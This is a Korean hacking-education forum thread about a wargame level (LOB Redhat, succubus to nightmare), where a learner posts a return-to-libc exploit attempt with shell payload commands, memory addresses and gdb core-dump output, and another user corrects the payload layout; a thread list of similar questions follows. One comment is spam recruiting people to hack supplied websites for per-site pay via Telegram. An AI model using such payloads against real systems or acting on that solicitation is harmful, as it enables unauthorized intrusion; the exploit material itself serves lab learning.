시스템 해킹

1574,

1/79

turttle2s

[LOB Redhat] succubus -> nightmare

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1981 [복사]

도저히 이해가 안가서 질문드립니다

제가 원하는 시나리오는,

strpy로 'AAAA'의 위치에 RTL코드가 들어있는 환경변수의 주소를 복사해서 strcpy가 끝난 후 ret시 RTL이 실행되게 하는 것 입니다.

일단 RTL 코드가 들어있는 환경변수를 만듭니다.

================================================
$ export WEAPON=`python -c 'print "\xe0\x8a\x05\x40"+"aaaa"+"\xf9\xbf\x0f\x40"+"\x90"*1000'`
================================================
"\x90"*1000 은 제가 환경변수 위치를 찾기 편하게 하기위해 추가했습니다.

이제부터 편의상 환경변수를 "RTL 코드" 라고 부르겠습니다.

그리고 core 파일 생성을 위해 아래 payload를 넣습니다.
================================================

./nightmare `python -c 'print "a"*44+"\x10\x84\x04\x08"+"AAAA"+"BBBB"+"CCCC"+"DDDD"'`
================================================

1. "AAAA"는 문제에서 붙여주는 문자열 입니다.
2. "BBBB"는 "AAAA"의 주소입니다. RTL 코드의 주소로 바뀌게 할 것입니다.
3. "CCCC"는 "DDDD"의 주소입니다. strcpy()에서 CCCC를 포인터로 사용하기 때문에 "AAAA"에는 "DDDD"값이 들어가게 될것입니다.
4. "DDDD"는 RTL 코드의 주소입니다.

그리고 gdb로 core 파일을 열어봅니다.
================================================
strcpy (dest=0x42424242 <Address 0x42424242 out of bounds>, src=0x43434343 <Address 0x43434343 out of bounds>)
    at ../sysdeps/generic/strcpy.c:37
../sysdeps/generic/strcpy.c: No such file or directory.
================================================
일단 strcpy.c 가 없다고 뜹니다. (이 오류가 왜 뜨는지는 모르겠습니다. 처음에는 gdb상에서 접근이 안되기 때문에 저런 오류가 뜨는걸로 알고있었는데 strcpy의 코드는 잘만 보여주더군요;;)

여기서 첫번째로 이해가 안되는 부분입니다.
================================================
(gdb) x/30wx $esp
0xbffff688:        "0x4000ae60"        0x61616161        0x41414141        0x42424242
0xbffff698:        0x43434343        0x44444444        0x00000000        0x08048420
0xbffff6a8:        0x00000000        0x08048441        0x080486b4        0x00000002
0xbffff6b8:        0xbffff6d4        0x08048350        0x0804877c        0x4000ae60
0xbffff6c8:        0xbffff6cc        0x40013e90        0x00000002        0xbffff7e0
0xbffff6d8:        0xbffff7ec        0x00000000        0xbffff82d        0xbffff84a
0xbffff6e8:        0xbffff863        0xbffff882        0xbffffc7e        0xbffffca0
0xbffff6f8:        0xbffffcae        0xbffffe71
================================================

제가 "로 묶어놓은 부분입니다.
저 주소의 코드를 보니 <_dl_fini> 부분으로 나오더군요.. 왜 갑자기 저게 생겼는지 모르겠고,
그 뒤의 4바이트를 보시면 0x61616161 이 들어있습니다. 원래 strcpy@plt 자리에 말이죠.

이것말고도 이해가 안되는 부분이 더 있는데, 글을 쓰다보니 이 문제를 먼저 해결하고 나서 삽질을 더 해봐야겠다는 생각에 일단 여기까지만 질문드려봅니다.

서큐버스한테 제대로 걸린 것 같습니다 ㅠㅠㅠ  here to stay.....

Hit : 1648 Date : 2019/09/26 08:15


ss4747	안녕하세요!! 모의해킹 가능자 모집 중인 해외업체입니다 업무의 진행방식은 프리랜서 형식으로 저희가 제공해드린 사이트 모의해킹 성공시 건당 으로 지급해드립니다 자세한안내사항및 기타문의는 텔래그램 ss4747 여기로 연락주시면 상세하게 알려드리겠습니다	2019/10/04
dnjsdnwja	"AAAA"을 원하는 return address("\xe0\x8a\x05\x40")로 바꾸고 뒤의 argument를 pass해주기 위해서는, "CCCC"에 DDDD의 주소를 넣지않고 그 자리에 그냥 DDDD를 넣어야 할 것으로 보이네요. 만약 "CCCC"에 DDDD의 주소를 넣으신다면 "AAAA"에는 그냥 환경변수 주소만 들어가고 이것은 원하시는 결과가 아니라고 생각됩니다.	2019/12/18
turttle2s	dnjsdnwja 답변 감사합니다. 이제 봤어요 ㅋㅋ 생각해보니까 제가 신중치 못했네요..	2019/12/23

1574

pwnable.kr echo1 질문2 (스포 주의)[2]

turttle2s

10/05

1180

1573

LOB GATE문제 풀면서 궁금한점[3]

hackxx123

08/24

842

1572

libc관련 - 2[5]

lMaxl04

08/24

837

1571

ASLR이 걸려있을때 ret에 ROP으로 jmp %esp을 사용한 경우.[3]

lMaxl04

06/29

1094

1570

리모트 환경에서의 스택 주소 확인 방법이 궁금합니다.[2]

lMaxl04

06/16

895

1569

해킹 프리서버 없어졌나요?[1]

terfkim

04/15

1671

1568

스택에 데이터 넣을 때 SIGSEGV[4]

turttle2s

02/04

1407

1567

pwnable.kr echo1 질문[2]

turttle2s

06/17

1682

1566

ROP strcpy 관련 질문입니다.[3]

heeyoung0511

06/16

1536

1565

Level2 -> Level3 에서 vi와 /usr/bin/Editor의 차이[2]

hyemin1826

07/18

1762

1564

Trainer3 ftz.hackerschool.org 호스트 접속 불가[1]

hyemin1826

07/18

3161

1563

dll인젝션 실험중 질문 드립니다.[1]

kkk477

05/31

1806

1562

패킷 복호화를 마스터 하려면 어떤 과정이 있어야하나요?

sa0814

04/01

1654

1561

사기[2]

jas08

03/31

1946

1560

시스템 콜이 가능한 메모리 영역과 불가능한 메모리 영역이 존재하나요?

ocal

03/30

1693

1559

pwntools 사용시와 기본 socket 모듈 이용시 차이?[4]

ocal

01/09

2223

1558

lob level19(nightmare) 관련질문[1]

dnjsdnwja

12/18

1703

1557

ftz level2 질문있습니다[1]

kihyun1998

12/13

1794

1556

ftz level2번 푸는데요 권한이...

kihyun1998

12/06

1669

1555

시스템해킹할때 [3]

thsrhkdwns

12/05

2138

1 [2][3][4][5][6][7][8][9][10]..[79]